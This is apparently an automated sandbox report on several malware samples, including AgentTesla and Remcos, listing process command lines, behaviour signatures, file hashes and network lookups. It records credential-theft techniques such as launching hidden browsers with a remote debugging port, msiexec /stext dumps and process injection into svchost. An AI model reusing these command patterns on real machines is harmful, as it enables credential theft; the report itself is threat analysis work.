C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ncwawjydvdgnobjtpsjobxnymosmy"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yxblpbjejlysyhffydwhmkhpvvkvznous"
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\izpdq"
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3824,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4436 /prefetch:1
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\Chrome.exe
"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,728381313881986946,9534086209070275171,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x128,0x138,0x7ffbc5d246f8,0x7ffbc5d24708,0x7ffbc5d24718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2132,18318594161552731191,13881943825905010243,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
Network
Files
| SHA256 | f64afc68606ad713a1ffb867d743d0d4e06622ff2ebd931092826cf0bb2d9832 |
| SHA512 | a1306bc1bc44c54f0a0c262ac21849e29a1cfe09fa5c994970a39e1d01e9ac71a797b0f2d28c26a7c0d74a8bacad54ed0515d210dae115028075efe84eb2fc37 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 8ec5604429aa10bb30abad674c2a3727 |
| SHA1 | 54025ded0aec9282618fbefe1e7399c29f507e3f |
| SHA256 | 0fd688ffa7caf28ce619d02866cb7f8fa5b08c2cde9890866cfa664b8fa87287 |
| SHA512 | 60e49442277a9100df546c5a615e2c989168f8ca277c9816e5b8aaff76a9fe79f870087392edb2e3173b9dcfc99212fc6a3d24ab363a19e610a4f16d21f54909 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites
| MD5 | 986962efd2be05909f2aaded39b753a6 |
| SHA1 | 657924eda5b9473c70cc359d06b6ca731f6a1170 |
| SHA256 | d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889 |
| SHA512 | e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data
| MD5 | 8756d59fff74778fd96b237b3eec8395 |
| SHA1 | 28a5b9df8bd87e06ed126cd7d1051d5341320d7f |
| SHA256 | 39528e8075ad4945f427199cb2a195e662a0cc7845fbb4fb4f41f443830752d1 |
| SHA512 | 67e6814c50fa1cba5012c901b3a19972ce0077e730a1d34254fe63819e77c1d2eda3ecb880fb120166783b63c88b6f37aff0c6defb5ee33fed1c1551dfd889e1 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History
| MD5 | d30bfa66491904286f1907f46212dd72 |
| SHA1 | 9f56e96a6da2294512897ea2ea76953a70012564 |
| SHA256 | 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907 |
| SHA512 | 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index
| MD5 | 8e885ca8ada27a92f52ea31836c410b0 |
| SHA1 | db255f56f3ebc7335e5071ceaf44e2cf43623b88 |
| SHA256 | a331fb8640445b56d69017dee31d85fa4015ce7f8817a4c5783fb2d245fc5405 |
| SHA512 | f904a33180a42de23c9d452bb7d6eea88963191625695deea9788f3249289f5f9908f06d1c9a46d975c75386ebb5c69383e004b044d2a840a9f11cfb7b2ebb07 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG
| MD5 | 41a68163440506a1138af56e653cee12 |
| SHA1 | 143ede4f640f93cfc4a70b5fb34f1c51fcbe6dda |
| SHA256 | 3f9f02ee27082b205b345acfe9150f4192aa597c162748aa81ea851f3dc3ce9f |
| SHA512 | 5e47495986549fdaa4d4f286ba17f9f314c8e9b348db64c0947c6e52499d34215886e46353baf95524b6ca0ffb078ede018f2e278a9f526bca8f2617a2a5ede1 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log
| MD5 | 9082ba76dad3cf4f527b8bb631ef4bb2 |
| SHA1 | 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0 |
| SHA256 | bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd |
| SHA512 | 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index
| MD5 | f7265870071b2b37bbdecf0c1716d263 |
| SHA1 | f2f7696a62361399c5d789300e76f74e6debec0b |
| SHA256 | 7d0ea03843ba0aff343ed49fff62190b59a335ad37be0c88878d377ad887fffa |
| SHA512 | 6d66829b2ef298ea92fb540493561eb6fff801596aaf25c5670387c1c6ec9e2aa0ec085f5d776c220b36a5e640df5e37796114dfc1018b8bf9d7d1d205783af0 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG
| MD5 | 9c4af6b762a96eaabc5674ac8e5943e6 |
| SHA1 | 2fda9bb6d9519b3dd6695f70ba85bef08b127a82 |
| SHA256 | 1a3b026700f34644a6c5b3cc354b78280592e3d923c40c37294fa329e3420378 |
| SHA512 | 50f3144e8716c54e1923244a89a1eb224af64059dee8a32e9fa115285295a841a6ad1046a5faae13024326d2fee43eb0b9e8a18f7aa9e3a23500e2c142454eb5 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log
| MD5 | 69449520fd9c139c534e2970342c6bd8 |
| SHA1 | 230fe369a09def748f8cc23ad70fd19ed8d1b885 |
| SHA256 | 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277 |
| SHA512 | ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG
| MD5 | e20671d4555b1e9b52e6cd25eeabdb3b |
| SHA1 | 7704948f8fece755763d82751647a6af2dfb1e53 |
| SHA256 | f063c3c7a1b007348a29488f10cd29031cd1f3b6411305b4451a763833587eff |
| SHA512 | ded9c3dc7859da4b73fe4023d9a374dfc83591f7ed9012787154c5b9107af5fe82f9272e389d0af5224185108d60fd166e570c88bec4587d3f189cf4b1fffc72 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG
| MD5 | 0f1705cb3faba911d053423cdeb781a6 |
| SHA1 | f5cf4c2e95dec60b10395935fb3a067aa7e0fa73 |
| SHA256 | 50b7cb048048f69804648aa9522a8b57230654ec423d85a9bc7013ac86495892 |
| SHA512 | c997f577d9baa3f64eaabba4bba05fb962e5df953f94564db71aefbfa547a6e0b9498a03df97915a73a99db64f4f3a681b9c5b134bfc7fa238672f2eda5f40fd |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log
| MD5 | 1bc117706514e615735c12e90d993e08 |
| SHA1 | c787d0821ace915a9cb95ed1c661373ed1e8ed5c |
| SHA256 | e9735cf00f39170df1433dad7ffe41d9949219e4b5055974940f1aa86c99e957 |
| SHA512 | 7217603eab35a95a2158dead7449fd306db98ad2d0f57c2464c7d416685ee3b56a988f34e51a88545879fdca58fc963b53e511121244aa3c4c3d7d5166b5c528 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG
| MD5 | 41b424e3977a94a1c51b0cf57fe62377 |
| SHA1 | 19e5b142c55c45e3da3ac417b3aebd6eff08a876 |
| SHA256 | c416e417bdbc116c4d2b95228da36f40b3d4e395796747a9a6feed724b76e80c |
| SHA512 | 201609edfcde53315bd05f94b86a54e9ce579891c8633ac05a301f9d7854f80f5471e3966ea6fa1fd6e339ed68d052ae3a1f1cb196c5aa533e3580a8b6238471 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | aa10f656cc16d036a580048ba0bdac0b |
| SHA1 | 52c15a55cc3b56bd1bf5dd0efcd2b66413b7044c |
| SHA256 | 166d97573db5472f64c5d066f2b07e6fbff2f1f9d5858fd7757548e334e9220d |
| SHA512 | 748fc7d5155285784ecea52d01af8168213210231a698073945b30b4989ae28463a7fee01e24792fd33b17744cd54587f801c5e836c926d700724171bb0000e9 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences
| MD5 | efa05a1197e8c99c4e3b80328d7f9877 |
| SHA1 | 2f1e45d4f2a2af155fab7816e193c05d26907c62 |
| SHA256 | 573b5f04516d813312a98a9c99d6a0e11fe83992d0da38ffebe0e4a96f39e06d |
| SHA512 | 48c3a00d2ad6a2b05346db2f9780cc0222994f762b68f530e0f9052be3d3781f44e7059663535e204cfe2f1d5d3e1de17aa267727186ce931d82f9c0d766af18 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log
| MD5 | 3ce3b6f5c6f9771919c33e02dc2145f8 |
| SHA1 | b1d0c203b4c6f4440748237cc974f29517d2e601 |
| SHA256 | 5bd0fd99d5403603546a18230fb10d4d44af35f43a967704c1a1d9c4855ffe2d |
| SHA512 | 617f45bc204fd298bb38b3d488cf6480df69fe8284bc3fbd05b9d4884327336610718c557c6cc63cb52b60cfdb9a58a38ff8b9b2d787df41dc9f42c422e68a43 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG
| MD5 | 3934d54bb471b8aa8dc050d7b746d39a |
| SHA1 | 5f43f4ad60c778e33010a227753c1280dc51bbb7 |
| SHA256 | 759765eb54ab4088a56fd867e2f48ad244f5d0526addf2572e836f418e13e04b |
| SHA512 | faeb4c33e0d6c93fef59916404748582b628742a7d533bba654ecf8c8834a5871f7f1c3c9e7e631278ed2a10eca8cb25de002a9b7633aa6f832eb67ff371d9d5 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sessions\Session_13375332689947578
| MD5 | ebbb98f85665c3011b4ef93b64893f55 |
| SHA1 | 4f0166780a6311760e472e2dfa3e12365c4eb098 |
| SHA256 | 21d4a39cb8809574b8cb46824e8c87680016fafd5accce6ac5e7946ebada9fd5 |
| SHA512 | fbbb14a716da5ee1c156c2b8e006ce1bd4372c164aa1ebbfd180b90102c80d4079590b1c87c0fa166e207b4bb3aad82711fe136ac10f1ea0d30a3cf78978e9e1 |
memory/4800-366-0x00000000008F0000-0x0000000001B43000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 0af0c51afe84b1353c7f836bfeccf5f6 |
| SHA1 | 7852c1a5bc2ee099b47a92f1dd2e45b178c1ed04 |
| SHA256 | 2049fc97ef064dceea2ed82e254253b238650b99e25f05f95b558b16a6c6d1ff |
| SHA512 | 1d95d3cfe0af44d51d73c44ec644079237f8c3ffc36dae3638d5c396e118602fbedbb0dec26ab69f2d380bd9b3694676a69cc2806258503dae353570bf98ebf9 |
memory/4800-372-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-375-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-378-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-381-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-385-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-388-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-391-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-394-0x00000000008F0000-0x0000000001B43000-memory.dmp
memory/4800-397-0x00000000008F0000-0x0000000001B43000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
141s
Max time network
146s
Command Line
Signatures
AgentTesla
Agenttesla family
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3828 set thread context of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Common Files\brisantgranatens\baegersvamp.For | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Azonic255\lithoclase.ini | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
| PID 3828 wrote to memory of 1316 | N/A | C:\Users\Admin\AppData\Local\Temp\Quotation.exe | C:\Users\Admin\AppData\Local\Temp\Quotation.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Quotation.exe
"C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
C:\Users\Admin\AppData\Local\Temp\Quotation.exe
"C:\Users\Admin\AppData\Local\Temp\Quotation.exe"
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\ping.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4444 wrote to memory of 4560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 4444 wrote to memory of 4560 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\ping.exe |
| PID 4444 wrote to memory of 2076 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4444 wrote to memory of 2076 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\報價請求 - 樣本目錄.vbs"
C:\Windows\System32\ping.exe
ping Horm5zl_6637.6637.6637.657e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 02:10
Reported
2024-11-06 02:13
Platform
win10ltsc2021-20241023-en
Max time kernel
98s
Max time network
140s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asset.vbs | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4400 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 624 wrote to memory of 4400 | N/A | C:\Users\Admin\AppData\Local\Temp\#10302024.exe | C:\Users\Admin\AppData\Local\phytographic\asset.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 4400 wrote to memory of 3940 | N/A | C:\Users\Admin\AppData\Local\phytographic\asset.exe | C:\Windows\SysWOW64\svchost.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\#10302024.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
C:\Users\Admin\AppData\Local\phytographic\asset.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\#10302024.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
